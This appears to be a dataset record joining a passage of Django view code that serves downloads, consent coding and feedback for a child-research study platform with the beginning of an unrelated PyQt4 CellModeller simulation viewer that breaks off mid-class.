                if col.id in columns_included_in_table
            }
            # Exception - store actual date object for date created
            this_resp_data["response__date_created"] = resp.date_created
            # info needed for summary table shown at right
            this_resp_data["summary"] = [
                {
                    "name": col.name,
                    "value": col.extractor(resp),
                    "description": col.description,
                }
                for col in RESPONSE_COLUMNS
                if col.id in columns_included_in_summary
            ]
            this_resp_data["videos"] = resp.videos.values("pk", "full_name")
            # Abbreviate the study-uuid and response-uuid segments of each
            # video filename for compact display.
            for v in this_resp_data["videos"]:
                v["display_name"] = (
                    v["full_name"]
                    .replace("videoStream_{}_".format(study.uuid), "...")
                    .replace("_{}_".format(resp.uuid), "...")
                )
            response_data.append(this_resp_data)
        context["response_data"] = response_data
        context["data_options"] = [col for col in RESPONSE_COLUMNS if col.optional]
        context["can_view_regular_responses"] = self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
        )
        context["can_view_preview_responses"] = self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
        )
        context["can_edit_feedback"] = self.request.user.has_study_perms(
            StudyPermission.EDIT_STUDY_FEEDBACK, context["study"]
        )
        return context

    def build_video_display_name(self, study_uuid, response_uuid, vid_name):
        """Return *vid_name* with the study/response uuid segments replaced by ellipses."""
        return ". . ." + ". . .".join(
            vid_name.split(study_uuid + "_")[1].split("_" + response_uuid + "_")
        )
class StudySingleResponseDownload(ResponseDownloadMixin, View):
    """Download a single response as JSON, summary CSV, or frame-data CSV."""

    def get(self, *args, **kwargs):
        """Serve the requested response in the requested format as an attachment.

        Raises SuspiciousOperation for an unknown data type or for a response
        that is not in the researcher-visible queryset.
        """
        data_type = self.request.GET.get("data-type-selector", None)
        if data_type not in ["json", "csv", "framedata"]:
            raise SuspiciousOperation
        response_id = self.request.GET.get("response_id", None)
        try:
            resp = self.get_queryset().get(pk=response_id)
        except ObjectDoesNotExist:
            raise SuspiciousOperation
        study = self.study
        header_options = set(self.request.GET.getlist("data_options"))
        extension = "json" if data_type == "json" else "csv"
        # NOTE(review): the "_frames" suffix is attached when data_type ==
        # "json", not "framedata" — this looks swapped; confirm intent.
        filename = "{}_{}{}.{}".format(
            study_name_for_files(study.name),
            str(resp.uuid),
            "_frames"
            if data_type == "json"
            else "_identifiable"
            if IDENTIFIABLE_DATA_HEADERS & header_options
            else "",
            extension,
        )
        if data_type == "json":
            cleaned_data = json.dumps(
                construct_response_dictionary(resp, RESPONSE_COLUMNS, header_options),
                indent="\t",
                default=str,
            )
        elif data_type == "csv":
            # One flattened row of summary data for this single response.
            row_data = flatten_dict(
                {col.id: col.extractor(resp) for col in RESPONSE_COLUMNS}
            )
            header_list = get_response_headers(header_options, row_data.keys())
            output, writer = csv_dict_output_and_writer(header_list)
            writer.writerow(row_data)
            cleaned_data = output.getvalue()
        elif data_type == "framedata":
            cleaned_data = build_single_response_framedata_csv(resp)
        else:
            raise SuspiciousOperation
        response = HttpResponse(cleaned_data, content_type="text/{}".format(extension))
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyResponseVideoAttachment(
    ResearcherLoginRequiredMixin, UserPassesTestMixin, StudyLookupMixin, View
):
    """Serve (or redirect to) one video attached to a consented response."""

    raise_exception = True

    @cached_property
    def video(self):
        # Only select the video from consented videos for this study
        return self.study.videos_for_consented_responses.get(
            pk=self.kwargs.get("video")
        )

    def can_view_this_video(self):
        """Require the response-data or preview-data read permission matching
        whether the video belongs to a preview response."""
        user = self.request.user
        study = self.study
        video = self.video
        return user.is_researcher and (
            (
                user.has_study_perms(StudyPermission.READ_STUDY_RESPONSE_DATA, study)
                and not video.response.is_preview
            )
            or (
                user.has_study_perms(StudyPermission.READ_STUDY_PREVIEW_DATA, study)
                and video.response.is_preview
            )
        )

    test_func = can_view_this_video

    def get(self, request, *args, **kwargs):
        """With ?mode=download, fetch and re-serve as an attachment; otherwise
        redirect to the storage download URL."""
        video = self.video
        download_url = video.download_url
        if self.request.GET.get("mode") == "download":
            r = requests.get(download_url)
            # NOTE(review): `File.open(...)` is called unbound with a BytesIO
            # as `self`; it happens to seek(0) and return the buffer, but
            # `File(io.BytesIO(r.content))` looks like the intent — confirm.
            response = FileResponse(
                File.open(io.BytesIO(r.content)),
                filename=video.filename,
                as_attachment=True,
            )
            return response
        return redirect(download_url)
class StudyResponseSubmitFeedback(StudyLookupMixin, UserPassesTestMixin, View):
    """Create new feedback on a response, or update existing feedback."""

    def user_can_edit_feedback(self):
        """Allow only researchers holding EDIT_STUDY_FEEDBACK on this study,
        and only for feedback/response ids that belong to this study."""
        user = self.request.user
        study = self.study
        # First check user has permission to be editing feedback from this study at all.
        # Bug fix: the original `not user.is_researcher and user.has_study_perms(...)`
        # applied `not` to the first operand only, so a researcher *without* the
        # permission slipped past this guard. Both conditions must hold.
        if not (
            user.is_researcher
            and user.has_study_perms(StudyPermission.EDIT_STUDY_FEEDBACK, study)
        ):
            return False
        # Check that the feedback_id (if given) is from this study
        feedback_id = self.request.POST.get("feedback_id", None)
        if feedback_id:
            try:
                feedback = Feedback.objects.get(id=feedback_id)
            except ObjectDoesNotExist:
                return False
            if feedback.response.study_id != study.pk:
                return False
        # Check that the response_id (if given) is from this study
        response_id = self.request.POST.get("response_id", None)
        if response_id:
            try:
                response = Response.objects.get(id=int(response_id))
            except ObjectDoesNotExist:
                return False
            if response.study_id != study.pk:
                return False
        return True

    test_func = user_can_edit_feedback

    def post(self, request, *args, **kwargs):
        """Update feedback when feedback_id is given; otherwise create feedback
        on response_id. Redirects back to the response list either way."""
        form_data = self.request.POST
        user = self.request.user
        study = self.study
        feedback_id = form_data.get("feedback_id", None)
        comment = form_data.get("comment", "")
        if feedback_id:
            Feedback.objects.filter(id=feedback_id).update(comment=comment)
        else:
            response_id = int(form_data.get("response_id"))
            Feedback.objects.create(
                response_id=response_id, researcher=user, comment=comment
            )
        return HttpResponseRedirect(
            reverse("exp:study-responses-list", kwargs=dict(pk=study.pk))
        )
class StudyResponsesConsentManager(
    ResearcherLoginRequiredMixin,
    UserPassesTestMixin,
    SingleObjectFetchProtocol[Study],
    generic.DetailView,
):
    """Consent-coding interface: review consent videos and record rulings."""

    template_name = "studies/study_responses_consent_ruling.html"
    queryset = Study.objects.all()
    raise_exception = True

    def user_can_code_consent(self):
        """Allow researchers who may code consent for real or preview data."""
        user = self.request.user
        study = self.get_object()
        return user.is_researcher and (
            user.has_study_perms(StudyPermission.CODE_STUDY_CONSENT, study)
            or user.has_study_perms(StudyPermission.CODE_STUDY_PREVIEW_CONSENT, study)
        )

    test_func = user_can_code_consent

    def get_context_data(self, **kwargs):
        """Load responses with their current rulings/videos and build a JSON
        key-value store of per-response details for the template's JS."""
        context = super().get_context_data(**kwargs)
        # Need to prefetch our responses with consent-footage videos.
        study = context["study"]
        # TODO: technically should not grant access to consent videos for preview data unless has that perm
        # (or should clearly indicate that code_study_consent means preview + actual data)
        preview_only = not self.request.user.has_study_perms(
            StudyPermission.CODE_STUDY_CONSENT, study
        )
        responses = get_responses_with_current_rulings_and_videos(
            study.id, preview_only
        )
        context["loaded_responses"] = responses
        context["summary_statistics"] = get_consent_statistics(study.id, preview_only)
        # Using a map for arbitrarily structured data - lists and objects that we can't just trivially shove onto
        response_key_value_store = {}
        paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for response in page_of_responses:
                # Chained assignment: register an empty dict under this uuid and
                # keep a handle on it to fill in below.
                response_json = response_key_value_store[str(response["uuid"])] = {}
                response["uuid"] = str(response.pop("uuid"))
                response_json["videos"] = response.pop("videos")
                response_json["details"] = {
                    "general": {
                        "uuid": response["uuid"],
                        "global_event_timings": json.dumps(
                            response.pop("global_event_timings")
                        ),
                        "sequence": json.dumps(response.pop("sequence")),
                        "completed": json.dumps(response.pop("completed")),
                        "date_created": str(response["date_created"]),
                    },
                    "participant": {
                        "hashed_id": hash_participant_id(response),
                        "uuid": str(response.pop("child__user__uuid")),
                        "nickname": response.pop("child__user__nickname"),
                    },
                    "child": {
                        "hashed_id": hash_child_id(response),
                        "uuid": str(response.pop("child__uuid")),
                        "name": response.pop("child__given_name"),
                        "birthday": str(response.pop("child__birthday")),
                        "gender": response.pop("child__gender"),
                        "additional_information": response.pop(
                            "child__additional_information"
                        ),
                    },
                }
        # Bug fix: this previously assigned into an undefined name `ext`,
        # raising NameError before the page could render.
        context["response_key_value_store"] = json.dumps(response_key_value_store)
        return context

    def post(self, request, *args, **kwargs):
        """Record consent rulings (accepted/rejected/pending) and comments."""
        form_data = self.request.POST
        user = self.request.user
        study = self.get_object()
        # Researchers with only the preview-consent permission may rule on
        # preview responses alone.
        preview_only = not self.request.user.has_study_perms(
            StudyPermission.CODE_STUDY_CONSENT, study
        )
        responses = study.responses
        if preview_only:
            responses = responses.filter(is_preview=True)
        comments = json.loads(form_data.get("comments"))
        for ruling in ("accepted", "rejected", "pending"):
            judged_responses = responses.filter(uuid__in=form_data.getlist(ruling))
            for response in judged_responses:
                response.consent_rulings.create(
                    action=ruling,
                    arbiter=user,
                    comments=comments.pop(str(response.uuid), None),
                )
                response.save()
        # Remaining comments belong to responses whose ruling was unchanged;
        # re-record the most recent ruling with the new comment.
        if comments:
            for resp_uuid, comment in comments.items():
                response = responses.get(uuid=resp_uuid)
                response.consent_rulings.create(
                    action=response.most_recent_ruling, arbiter=user, comments=comment
                )
        return HttpResponseRedirect(
            reverse(
                "exp:study-responses-consent-manager",
                kwargs=dict(pk=self.get_object().pk),
            )
        )

    def get(self, request, *args, **kwargs):
        """External studies have no consent footage; redirect with an error."""
        if self.get_object().study_type.is_external:
            messages.error(request, "There is no consent manager for external studies.")
            return HttpResponseRedirect(reverse("exp:study-detail", kwargs=kwargs))
        else:
            return super().get(request, *args, **kwargs)
class StudyResponsesAll(
    CanViewStudyResponsesMixin, SingleObjectFetchProtocol[Study], generic.DetailView
):
    """Landing page offering all-response downloads for a study."""

    template_name = "studies/study_responses_all.html"
    queryset = Study.objects.all()
    http_method_names = ["get"]

    def get_context_data(self, **kwargs):
        """Add the response count, optional-column choices, and permission flags."""
        context = super().get_context_data(**kwargs)
        context["n_responses"] = (
            context["study"].responses_for_researcher(self.request.user).count()
        )
        # Optional columns the researcher may include in downloads.
        context["data_options"] = [col for col in RESPONSE_COLUMNS if col.optional]
        context["can_delete_preview_data"] = self.request.user.has_study_perms(
            StudyPermission.DELETE_ALL_PREVIEW_DATA, context["study"]
        )
        context["can_view_regular_responses"] = self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
        )
        context["can_view_preview_responses"] = self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
        )
        return context
class StudyDeletePreviewResponses(
    ResearcherLoginRequiredMixin,
    UserPassesTestMixin,
    SingleObjectFetchProtocol[Study],
    SingleObjectMixin,
    View,
):
    """Delete all preview responses for a study (POST only)."""

    queryset = Study.objects.all()

    def user_can_delete_preview_data(self):
        """Require the DELETE_ALL_PREVIEW_DATA study permission."""
        user = self.request.user
        study = self.get_object()
        return user.is_researcher and user.has_study_perms(
            StudyPermission.DELETE_ALL_PREVIEW_DATA, study
        )

    test_func = user_can_delete_preview_data

    def post(self, request, *args, **kwargs):
        """Delete preview responses in batches, then redirect to the responses page."""
        study = self.get_object()
        preview_responses = study.responses.filter(is_preview=True).prefetch_related(
            "videos", "responselog_set", "consent_rulings", "feedback"
        )
        # Delete in fixed-size batches to bound memory use. Bug fix: the
        # original walked successive Paginator pages while deleting, but each
        # delete shifts the remaining rows into earlier pages, so later pages
        # skipped rows. Re-fetching the first RESPONSE_PAGE_SIZE rows until
        # none remain deletes everything.
        while True:
            batch = list(preview_responses[:RESPONSE_PAGE_SIZE])
            if not batch:
                break
            for resp in batch:
                resp.delete()
        return HttpResponseRedirect(
            reverse("exp:study-responses-all", kwargs={"pk": study.id})
        )
class StudyResponsesJSON(ResponseDownloadMixin, generic.list.ListView):
    """Stream all responses for a study as one JSON array."""

    # Paginate one response at a time so the streaming response never holds
    # all responses in memory.
    paginate_by = 1

    def make_chunk(self, paginator, page_num, header_options):
        """Return the JSON text for one page, adding array delimiters.

        The first page opens the array, the last closes it, and every page but
        the last ends with a comma so consecutive chunks concatenate into
        valid JSON.
        """
        chunk = ""
        if page_num == 1:
            chunk = "[\n"
        chunk += ",\n".join(
            json.dumps(
                construct_response_dictionary(resp, RESPONSE_COLUMNS, header_options),
                indent="\t",  # Use tab rather than spaces to make file smaller (ex. 60MB -> 25MB)
                default=str,
            )
            for resp in paginator.page(page_num)
        )
        if page_num == paginator.page_range[-1]:
            chunk += "\n]"
        else:
            chunk += ",\n"
        return chunk

    def render_to_response(self, context, **response_kwargs):
        """Stream one JSON chunk per page as a downloadable attachment."""
        paginator = context["paginator"]
        study = self.study
        header_options = set(self.request.GET.getlist("data_options"))
        filename = "{}_{}.json".format(
            study_name_for_files(study.name),
            "all-responses"
            + ("-identifiable" if IDENTIFIABLE_DATA_HEADERS & header_options else ""),
        )
        response = StreamingHttpResponse(
            (
                self.make_chunk(paginator, page_num, header_options)
                for page_num in paginator.page_range
            ),
            content_type="text/json",
        )
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyResponsesCSV(ResponseDownloadMixin, generic.list.ListView):
    """Download all responses for a study as a single summary CSV."""

    def render_to_response(self, context, **response_kwargs):
        """Collect one flattened row per response, then write them with the
        union of all headers seen (plus/minus the selected optional columns)."""
        paginator = context["paginator"]
        study = self.study
        headers = set()
        session_list = []
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for resp in page_of_responses:
                row_data = flatten_dict(
                    {col.id: col.extractor(resp) for col in RESPONSE_COLUMNS}
                )
                # Add any new headers from this session
                headers = headers | row_data.keys()
                session_list.append(row_data)
        header_options = set(self.request.GET.getlist("data_options"))
        header_list = get_response_headers(header_options, headers)
        output, writer = csv_dict_output_and_writer(header_list)
        writer.writerows(session_list)
        cleaned_data = output.getvalue()
        # Flag the filename when identifiable columns were requested.
        filename = "{}_{}.csv".format(
            study_name_for_files(study.name),
            "all-responses"
            + ("-identifiable" if IDENTIFIABLE_DATA_HEADERS & header_options else ""),
        )
        response = HttpResponse(cleaned_data, content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyResponsesDictCSV(CanViewStudyResponsesMixin, View):
    """Download a CSV data dictionary describing the response summary columns."""

    def build_summary_dict_csv(self, optional_headers_selected_ids):
        """Return CSV text with one (column, description) row per included header."""
        descriptions = {col.id: col.description for col in RESPONSE_COLUMNS}
        selected_headers = get_response_headers(
            optional_headers_selected_ids, descriptions.keys()
        )
        dictionary_rows = [
            {"column": header_id, "description": descriptions[header_id]}
            for header_id in selected_headers
        ]
        csv_buffer, csv_writer = csv_dict_output_and_writer(["column", "description"])
        csv_writer.writerows(dictionary_rows)
        return csv_buffer.getvalue()

    def get(self, request, *args, **kwargs):
        """Serve the data dictionary CSV as an attachment."""
        selected_options = self.request.GET.getlist("data_options")
        dict_csv = self.build_summary_dict_csv(selected_options)
        filename = f"{study_name_for_files(self.study.name)}_all-responses-dict.csv"
        response = HttpResponse(dict_csv, content_type="text/csv")
        response["Content-Disposition"] = f'attachment; filename="{filename}"'
        return response
class StudyChildrenCSV(ResponseDownloadMixin, generic.list.ListView):
    """Download identifiable data about all children who participated, one CSV
    row per unique child."""

    def render_to_response(self, context, **response_kwargs):
        """Build child rows from the responses, de-duplicated on the child's
        global ID (first occurrence kept), and serve as a CSV attachment."""
        paginator = context["paginator"]
        study = self.study
        # Set membership is O(1); the original list-based lookup made
        # de-duplication quadratic in the number of responses.
        seen_child_ids = set()
        session_list = []
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for resp in page_of_responses:
                row_data = flatten_dict(
                    {
                        col.id: col.extractor(resp)
                        for col in RESPONSE_COLUMNS
                        if col.id in CHILD_CSV_HEADERS
                    }
                )
                child_id = row_data["child__global_id"]
                if child_id not in seen_child_ids:
                    seen_child_ids.add(child_id)
                    session_list.append(row_data)
        output, writer = csv_dict_output_and_writer(CHILD_CSV_HEADERS)
        writer.writerows(session_list)
        cleaned_data = output.getvalue()
        filename = "{}_{}.csv".format(
            study_name_for_files(study.name), "all-children-identifiable"
        )
        response = HttpResponse(cleaned_data, content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyChildrenDictCSV(CanViewStudyResponsesMixin, View):
    """Download a CSV data dictionary describing the child-level columns."""

    def build_child_dict_csv(self):
        """Return CSV text with one (column, description) row per child column."""
        dictionary_rows = [
            {"column": column.id, "description": column.description}
            for column in RESPONSE_COLUMNS
            if column.id in CHILD_CSV_HEADERS
        ]
        csv_buffer, csv_writer = csv_dict_output_and_writer(["column", "description"])
        csv_writer.writerows(dictionary_rows)
        return csv_buffer.getvalue()

    def get(self, request, *args, **kwargs):
        """Serve the child data dictionary CSV as an attachment."""
        dict_csv = self.build_child_dict_csv()
        filename = f"{study_name_for_files(self.study.name)}_all-children-dict.csv"
        response = HttpResponse(dict_csv, content_type="text/csv")
        response["Content-Disposition"] = f'attachment; filename="{filename}"'
        return response
class StudyResponsesFrameDataCSV(ResponseDownloadMixin, generic.list.ListView):
    """Download per-session frame data as a zip of one CSV per response."""

    # TODO: with large files / many responses generation can take a while. Should generate asynchronously along
    # with the data dict.
    def render_to_response(self, context, **response_kwargs):
        """Build the zip in memory and serve it; external studies have no
        frame data, so redirect with an error instead."""
        paginator = context["paginator"]
        study = self.study
        if study.study_type.is_external:
            messages.error(
                self.request, "Frame data is not available for External Studies."
            )
            return redirect(reverse("exp:study-responses-all", kwargs={"pk": study.pk}))
        # Assemble the archive entirely in memory.
        zipped_file = io.BytesIO()
        with zipfile.ZipFile(zipped_file, "w", zipfile.ZIP_DEFLATED) as zipped:
            for page_num in paginator.page_range:
                page_of_responses = paginator.page(page_num)
                for resp in page_of_responses:
                    data = build_single_response_framedata_csv(resp)
                    filename = "{}_{}_{}.csv".format(
                        study_name_for_files(study.name), resp.uuid, "frames"
                    )
                    zipped.writestr(filename, data)
        # Rewind so FileResponse streams from the beginning.
        zipped_file.seek(0)
        response = FileResponse(
            zipped_file,
            as_attachment=True,
            filename="{}_framedata_per_session.zip".format(
                study_name_for_files(study.name)
            ),
        )
        return response
class StudyResponsesFrameDataDictCSV(ResponseDownloadMixin, View):
    """Kick off asynchronous generation of the frame-data dictionary CSV."""

    def get(self, request, *args, **kwargs):
        """Queue the build task (the researcher is emailed a link on completion)
        and redirect back to the responses page. Not available for external
        studies, which have no frame data."""
        study = self.study
        if study.study_type.is_external:
            messages.error(
                request, "Frame data dictionary is not available for external studies"
            )
        else:
            filename = "{}_{}_{}".format(
                study_name_for_files(study.name), study.uuid, "all-frames-dict"
            )
            # Celery task; runs out of band.
            build_framedata_dict.delay(filename, study.uuid, self.request.user.uuid)
            messages.success(
                request,
                f"A frame data dictionary for {study.name} is being generated. You will be emailed a link when it's completed.",
            )
        return HttpResponseRedirect(
            reverse("exp:study-responses-all", kwargs=self.kwargs)
        )
class StudyDemographics(
    CanViewStudyResponsesMixin, SingleObjectFetchProtocol[Study], generic.DetailView
):
    """Landing page for downloading demographic-snapshot data for a study."""

    template_name = "studies/study_demographics.html"
    queryset = Study.objects.all()

    def get_context_data(self, **kwargs):
        """Add the response count and view-permission flags."""
        context = super().get_context_data(**kwargs)
        context["n_responses"] = (
            context["study"].responses_for_researcher(self.request.user).count()
        )
        context["can_view_regular_responses"] = self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
        )
        context["can_view_preview_responses"] = self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
        )
        return context
class StudyDemographicsJSON(DemographicDownloadMixin, generic.list.ListView):
    """Download all demographic snapshots for a study as one JSON array."""

    def render_to_response(self, context, **response_kwargs):
        """Serialize each snapshot (demographic columns only, no experiment
        data) and serve the joined array as an attachment."""
        study = self.study
        header_options = self.request.GET.getlist("demo_options")
        json_responses = []
        paginator = context["paginator"]
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for resp in page_of_responses:
                json_responses.append(
                    json.dumps(
                        construct_response_dictionary(
                            resp,
                            DEMOGRAPHIC_COLUMNS,
                            header_options,
                            include_exp_data=False,
                        ),
                        indent="\t",
                        default=str,
                    )
                )
        cleaned_data = f"[ {', '.join(json_responses)} ]"
        filename = "{}_{}.json".format(
            study_name_for_files(study.name), "all-demographic-snapshots"
        )
        response = HttpResponse(cleaned_data, content_type="text/json")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyDemographicsCSV(DemographicDownloadMixin, generic.list.ListView):
    """Download all demographic snapshots for a study as a CSV."""

    def render_to_response(self, context, **response_kwargs):
        """Extract one row per snapshot, restrict columns per the selected
        demo_options, and serve the CSV as an attachment."""
        study = self.study
        paginator = context["paginator"]
        header_options = set(self.request.GET.getlist("demo_options"))
        participant_list = []
        headers_for_download = get_demographic_headers(header_options)
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for resp in page_of_responses:
                row_data = {col.id: col.extractor(resp) for col in DEMOGRAPHIC_COLUMNS}
                participant_list.append(row_data)
        output, writer = csv_dict_output_and_writer(headers_for_download)
        writer.writerows(participant_list)
        cleaned_data = output.getvalue()
        filename = "{}_{}.csv".format(
            study_name_for_files(study.name), "all-demographic-snapshots"
        )
        response = HttpResponse(cleaned_data, content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyDemographicsDictCSV(DemographicDownloadMixin, generic.list.ListView):
    """Download a CSV data dictionary for the demographic-snapshot columns."""

    def render_to_response(self, context, **response_kwargs):
        """Write one (column, description) row per included demographic column."""
        header_options = set(self.request.GET.getlist("demo_options"))
        headers_for_download = get_demographic_headers(header_options)
        all_descriptions = [
            {"column": col.id, "description": col.description}
            for col in DEMOGRAPHIC_COLUMNS
            if col.id in headers_for_download
        ]
        output, writer = csv_dict_output_and_writer(["column", "description"])
        writer.writerows(all_descriptions)
        cleaned_data = output.getvalue()
        filename = "{}_{}.csv".format(
            study_name_for_files(self.study.name), "all-demographic-snapshots-dict"
        )
        response = HttpResponse(cleaned_data, content_type="text/csv")
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyCollisionCheck(ResponseDownloadMixin, View):
    """Check whether any two distinct participants/children hash to the same ID
    under this study's salt, and report collisions as JSON."""

    def get(self, request, *args, **kwargs):
        """Scan consented responses page by page, mapping hashed IDs back to
        global uuids; report any hashed ID seen with two different uuids."""
        study = self.study
        responses = (
            study.consented_responses.order_by("id")
            .select_related("child", "child__user", "study")
            .values(
                "uuid",
                "child__uuid",
                "child__user__uuid",
                "study__uuid",
                "study__salt",
                "study__hash_digits",
            )
        )
        child_dict = {}
        account_dict = {}
        collision_text = ""
        paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for resp in page_of_responses:
                participant_hashed_id = hash_participant_id(resp)
                participant_global_id = resp["child__user__uuid"]
                child_hashed_id = hash_child_id(resp)
                child_global_id = resp["child__uuid"]
                if participant_hashed_id in account_dict:
                    if participant_global_id != account_dict[participant_hashed_id]:
                        # NOTE(review): participant collisions are joined with
                        # "\n" but child collisions below use "<br>" — confirm
                        # which separator the consumer expects.
                        collision_text += "Participant hashed ID {} ({}, {})\n".format(
                            participant_hashed_id,
                            account_dict[participant_hashed_id],
                            participant_global_id,
                        )
                else:
                    account_dict[participant_hashed_id] = participant_global_id
                if child_hashed_id in child_dict:
                    if child_global_id != child_dict[child_hashed_id]:
                        collision_text += "Child hashed ID {} ({}, {})<br>".format(
                            child_hashed_id,
                            child_dict[child_hashed_id],
                            child_global_id,
                        )
                else:
                    child_dict[child_hashed_id] = child_global_id
        return JsonResponse({"collisions": collision_text})
class StudyAttachments(CanViewStudyResponsesMixin, generic.ListView):
    """List video attachments for consented responses; POST queues zip builds."""

    template_name = "studies/study_attachments.html"
    model = Video
    paginate_by = 100

    def get_ordering(self):
        """Sort by the ?sort= param, defaulting to newest first."""
        return self.request.GET.get("sort", "-created_at") or "-created_at"

    def get_queryset(self):
        """Videos for consented responses, restricted to preview-only or
        real-only depending on which read permission the user holds, and
        optionally filtered by a ?match= substring."""
        study = self.study
        videos = study.videos_for_consented_responses
        if not self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_RESPONSE_DATA, study
        ):
            videos = videos.filter(response__is_preview=True)
        if not self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_PREVIEW_DATA, study
        ):
            videos = videos.filter(response__is_preview=False)
        match = self.request.GET.get("match", "")
        if match:
            videos = videos.filter(full_name__icontains=match)
        return videos.order_by(self.get_ordering())

    def get_context_data(self, **kwargs):
        """Expose the current match filter and study to the template."""
        context = super().get_context_data(**kwargs)
        context["match"] = self.request.GET.get("match", "")
        context["study"] = self.study
        return context

    def post(self, request, *args, **kwargs):
        """Queue Celery tasks to build zip archives of all videos and/or all
        consent videos; the researcher is emailed a link on completion."""
        match = self.request.GET.get("match", "")
        study = self.study
        if self.request.POST.get("all-attachments"):
            build_zipfile_of_videos.delay(
                f"{study.uuid}_videos",
                study.uuid,
                match,
                self.request.user.uuid,
                consent_only=False,
            )
            messages.success(
                request,
                f"An archive of videos for {study.name} is being generated. You will be emailed a link when it's completed.",
            )
        if self.request.POST.get("all-consent-videos"):
            build_zipfile_of_videos.delay(
                f"{study.uuid}_consent_videos",
                study.uuid,
                match,
                self.request.user.uuid,
                consent_only=True,
            )
            messages.success(
                request,
                f"An archive of consent videos for {study.name} is being generated. You will be emailed a link when it's completed.",
            )
        return HttpResponseRedirect(
            reverse("exp:study-attachments", kwargs=self.kwargs)
        )
| true | true |
f72edc7d2c194fe94d3f029b4088fafe7afdce75 | 3,944 | py | Python | CellModeller/GUI/PyGLCMViewer.py | pakpoomton/CellmodellerShadow | c3fdc0aa41ca2cbd56a3eae168e27312a5c0c185 | [
"BSD-3-Clause"
] | null | null | null | CellModeller/GUI/PyGLCMViewer.py | pakpoomton/CellmodellerShadow | c3fdc0aa41ca2cbd56a3eae168e27312a5c0c185 | [
"BSD-3-Clause"
] | null | null | null | CellModeller/GUI/PyGLCMViewer.py | pakpoomton/CellmodellerShadow | c3fdc0aa41ca2cbd56a3eae168e27312a5c0c185 | [
"BSD-3-Clause"
] | null | null | null | import PyQt4
from PyQt4 import QtCore, QtGui
from PyQt4.Qt import Qt
from PyQt4.QtCore import QObject, QTimer, pyqtSignal, pyqtSlot
from PyGLWidget import PyGLWidget
from OpenGL.GL import *
from OpenGL.GLU import *
from CellModeller.Regulation import ModuleRegulator
from CellModeller.Simulator import Simulator
from CellModeller.CellState import CellState
import os
import sys
class PyGLCMViewer(PyGLWidget):
    """OpenGL widget hosting a CellModeller simulation: runs/steps the
    simulator on a Qt timer, renders it, and reports the selected cell.

    NOTE(review): `states.has_key(...)` below indicates Python 2-era code
    (consistent with PyQt4).
    """

    selectedCell = pyqtSignal(str)#CellState, name='selectedCell')
    # Name (pick id) of the currently selected cell; -1 means none.
    selectedName = -1
    # Simulation time step passed to Simulator.
    dt = 0.25
    def __init__(self, parent = None):
        PyGLWidget.__init__(self,parent)
        # Timer drives continuous stepping; interval 0 = run as fast as possible.
        self.animTimer = QTimer()
        self.animTimer.timeout.connect(self.animate)
        self.renderInfo = None
        self.sim= None
        self.modfile = None
        self.record = False
        self.set_radius(32)
        self.frameNo = 0
    def help(self):
        pass
    def setSimulator(self, sim):
        self.sim = sim
    @pyqtSlot(bool)
    def toggleRun(self, run):
        """Start/stop continuous simulation stepping."""
        if run:
            self.animTimer.start(0)
        else:
            self.animTimer.stop()
    @pyqtSlot(bool)
    def toggleRecord(self, rec):
        """Toggle snapshot recording and simulator pickling."""
        self.record = rec
        self.sim.savePickle = rec
    @pyqtSlot()
    def reset(self):
        """Recreate the simulator from the current module and restart frames."""
        self.sim = Simulator(self.modname, self.dt)
        #if self.sim:
        #    self.sim.reset()
        self.frameNo = 0
    @pyqtSlot()
    def load(self):
        """Prompt for a Python model module and load it."""
        qs = QtGui.QFileDialog.getOpenFileName(self, 'Load Python module', '', '*.py')
        self.modfile = str(qs)
        self.loadFile(self.modfile)
    def loadFile(self, modstr):
        """Load the model module at path *modstr*, reusing the simulator if one exists."""
        (path,name) = os.path.split(modstr)
        modname = str(name).split('.')[0]
        self.modname = modname
        # Make the module importable by the simulator.
        sys.path.append(path)
        if self.sim:
            self.sim.reset(modname)
        else:
            self.sim = Simulator(modname, self.dt)
        #self.draw()
        self.paintGL()
    def animate(self):
        """One timer tick: step the simulation and optionally save a snapshot."""
        if self.sim:
            self.sim.step()
            self.updateSelectedCell()
            self.frameNo += 1
            if self.record:
                # Record every 5th frame.
                if (self.frameNo%5)==0:
                    self.setSnapshotCounter(self.frameNo)
                    self.saveSnapshot()
    def updateSelectedCell(self):
        """Emit the selected cell's state as text; periodically redraw."""
        if self.sim:
            states = self.sim.cellStates
            cid = self.selectedName
            txt = ''
            if states.has_key(cid):
                s = states[cid]
                for (name,val) in s.__dict__.items():
                    if name not in CellState.excludeAttr:
                        vals = str(val)
                        #if len(vals)>6: vals = vals[0:6]
                        txt = txt + name + ': ' + vals + '\n'
            self.selectedCell.emit(txt)
            # Redraw only every 100 steps to limit GL overhead.
            if self.sim.stepNum%100==0:
                self.updateGL()
    def postSelection(self, name):
        """Callback from picking: remember the selection and refresh its info."""
        self.selectedName = name
        self.updateSelectedCell()
    def paintGL(self):
        """Clear and render all simulator renderers."""
        PyGLWidget.paintGL(self)
